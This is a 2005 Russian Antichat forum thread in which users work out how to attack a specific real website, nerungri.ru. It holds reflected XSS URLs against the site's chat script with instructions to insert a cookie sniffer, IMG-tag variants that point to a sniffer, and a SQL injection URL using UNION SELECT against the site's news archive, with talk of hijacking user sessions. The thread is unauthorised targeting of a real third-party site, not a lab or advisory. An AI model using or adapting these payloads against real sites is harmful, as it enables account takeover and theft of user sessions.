Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

25.12.2005, 21:09
|
|
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме: 21874
Репутация:
0
|
|
Какие дыры у него есть?
|
|
|

25.12.2005, 21:18
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<script>alert(/XXX/);</script>
подставь сниффер и закодируй в URL
|
|
|

26.12.2005, 13:10
|
|
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме: 21874
Репутация:
0
|
|
Поставил сниффер а как URL закодировать,
и ещё когда кидаю ссылку на снифер открывается новое окно ив нем загружаеться сниффер, поэтому в поле REFERRER нифига нет!
Последний раз редактировалось Razial; 26.12.2005 в 13:15..
|
|
|

27.12.2005, 10:44
|
|
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме: 21874
Репутация:
0
|
|
Вот если я подставляю снифер:
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<IMG src=адрес сниффера>
а дальше чё???
вот ещё
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=userinfo&infoabout=<IMG%20src%3D дрес>
Последний раз редактировалось Razial; 27.12.2005 в 11:30..
|
|
|

27.12.2005, 13:32
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
я поподробнее посмотрел, там куки красть бесполезно, нужна сессия
|
|
|

27.12.2005, 15:58
|
|
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме: 21874
Репутация:
0
|
|
Последний раз редактировалось Razial; 27.12.2005 в 16:04..
|
|
|

28.12.2005, 19:10
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
http://www.nerungri.ru/site/cnews/arhiv.shtml?Act=NewsList&Date=2004-05-06%27%20UNION%20SELECT+0,0,0,0,0,VERSION(),0,0,0,0/*
http://www.nerungri.ru/site/cnews/ar...%20user_id=2/*
вот это под форум, щас надо попросить кого-нито, чтоб привязали уязвимость к чату
|
|
|

28.12.2005, 20:53
|
|
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме: 21874
Репутация:
0
|
|
Это получчается он сессию выводит, только вот чью? и какое это имеет отношение к чату?
Последний раз редактировалось Razial; 28.12.2005 в 21:05..
|
|
|

28.12.2005, 21:02
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
|
|
|

28.12.2005, 21:07
|
|
Новичок
Регистрация: 25.12.2005
Сообщений: 12
Провел на форуме: 21874
Репутация:
0
|
|
Nikita, RaKoT, 1inch
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|